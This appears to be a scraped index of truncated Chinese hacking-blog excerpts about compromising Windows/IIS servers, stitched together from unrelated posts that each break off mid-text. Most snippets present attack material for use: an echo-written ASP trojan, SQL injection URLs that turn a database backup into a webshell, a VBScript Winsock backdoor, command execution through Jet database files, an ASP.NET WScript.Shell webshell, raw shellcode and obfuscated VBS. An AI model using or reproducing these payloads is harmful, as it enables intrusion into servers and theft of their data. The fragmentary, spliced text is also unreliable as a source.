Set os=CreateObject("wscript.shell")Set os0=CreateObject("shell.application")Do input1=InputBox(" 请选择："+chr(13)+chr(13)+ _        "1. 全部窗口最小化"+chr(13)+ _         "2. 窗口状态复原"+c...

文件传输对于溢出漏洞获得的cmd shell，最大的问题就是如何上传文件。由于蠕虫病毒流行，连接ipc$所需要的139或445端口被路由封锁。再加上WinXP系统加强了对ipc$的保护，通过ipc$及默认共享上传文件的手段基本无效了。ftp和tftp是两种可行的方法，介于其已被大家熟知，本文就不介绍了。还有三种大家熟悉的办法，作为总结我再提一下：1，用Echo命令写ASP木马。前提当然是目标主机上已经安装了IIS。一般的ASP木马"体积"较大，不适合直接用echo命令写入文件，这里我提供一个小巧的。直接给出echo版：@echo ^ >up.asp注意，只有...

注:转载就注入出自'孤孤浪子博客'原创http://itpro.blog.163.com第一步http://itpro.blog.163.com/test.asp';alter/**/database/**/[netwebhome]/**/set/**/recovery/**/full[/url]--第二步：http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[netweb...

'搞一个特殊的站准备用的，没想到，等写完了，洞补上了，郁闷'by 009, baicker@hotmail.com'date:071221Dim revdataset sock=WScript.createobject( "MSWinsock.Winsock" , "WSEvent_" )set sc=createobject( "WScript.Shell" )Set fso =CreateObject( "Scripting.FileSystemObj...

最大的局限就在这里——插入数据，所以我们只能从程序现有的功能入手，其实很多程序都可以提交评论、留言、帖子等，就看程序是怎么把变量插入数据库的。其实道路就在我们身边，靠我们自己去开辟。　　不用多说，先看在本地测试的一个简单例子，建立一个表，结构如下：CREATE TABLE `article` (　`articleid` INT NOT NULL AUTO_INCREMENT ,　`title` VARCHAR( 200 ) NOT NULL ,　`cont...

利用jet执行shell命令比想办法恢复xp_cmdshell来得经济实惠，不过需要猜一下系统路径nt/2k: x:\winnt\system32\xp/2003: x:\windows\system32\解决办法：如果不需要RDS支持，请删除x:\Program Files\Common Files\System\Msadc\msadcs.dll仅仅修改注册表是不够的，具体看下文详述当然除了IAS.mdb这个之外，还有其他的mdb文件也可以，只要文件存在即可2003的system32下就有两个：ias.mdb和dnary.mdb其他系统你可以dir&n...

ASP.NET提供了两种方法让我们使用COM组件：1、Server对象的CreatObject方法；2、将COM组件转化为.NET组件。·Server对象的CreatObject方法这个方法比较简单，直接使用就是。当然前提是服务器上已经注册了该组件，而WScript.Shell是系统自带的，我们不用担心。只是在编写代码时注意ASP.NET与ASP语法上的细微差别就可以了。直接给出代码如下：<!--Titel: WScript.Shell .NET Version 1Author: lake2Mail: lake2@mail.cs...

'code by NetPatchcode="\x29\xc9\x83\xe9\xa1\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x92\x06\x5b\x18\x83\xeb\xfc\xe2\xf4\x79\x16\x01\x52\xa1\xcf\x3d\xa1\xae\x07\xdb\x2c\x98\x9f\xb9\xe2\x79\x03\xb3\xf3\x6d\xf9\xa4\x68\xde\x9f\xc2\x81\x51\xfb\x63\xb1\x0b\x9f\xc2\x0a\x4b\x93\x49\xf1\x17\x32\x4...

下面用一个简单的shell程序要说明一下。debian:~/learn/shell# cat phonebookAlice Chebba 973-555-2015Barbara Swingle 201-555-9257Liz Stachiw 212-555-2298Susan Goldberg 201-555-7776Susan Topple 212-555-4932Tony Iannino 973-555-1295Stromboli Pizza...

默认IIS站点配置文件有2个MBSchema.xm和MetaBase.xml,路径是C:\WINDOWS\system32\inetsrv\(一般这个目录设置的everyone读的权限.)MetaBase.xml这个文件是存的站点IIS配置的信息.里面可以查到所有本服务器IIS下设置的站点目录和配置。几个主要的配置有:ServerComment:我的网站 //站点的名称ServerBindings:80 //站点的端口Path="D:\wwwroot" //这里是站点的路径DefaultDoc="index.asp,index.php,index.htm,Defa...

[code]Dim enTmp,enstr,a,bb enstr=Str2Hex("RHptd4RPFZVOdoVQTrvWTnTp4n6PVN6QTop1tnau1hsU") For i = 1 To Len(enStr) step 6    enTmp =Array(Mid(enStr,i,6)&"00")    sz =Split(enTmp(0), ",", -...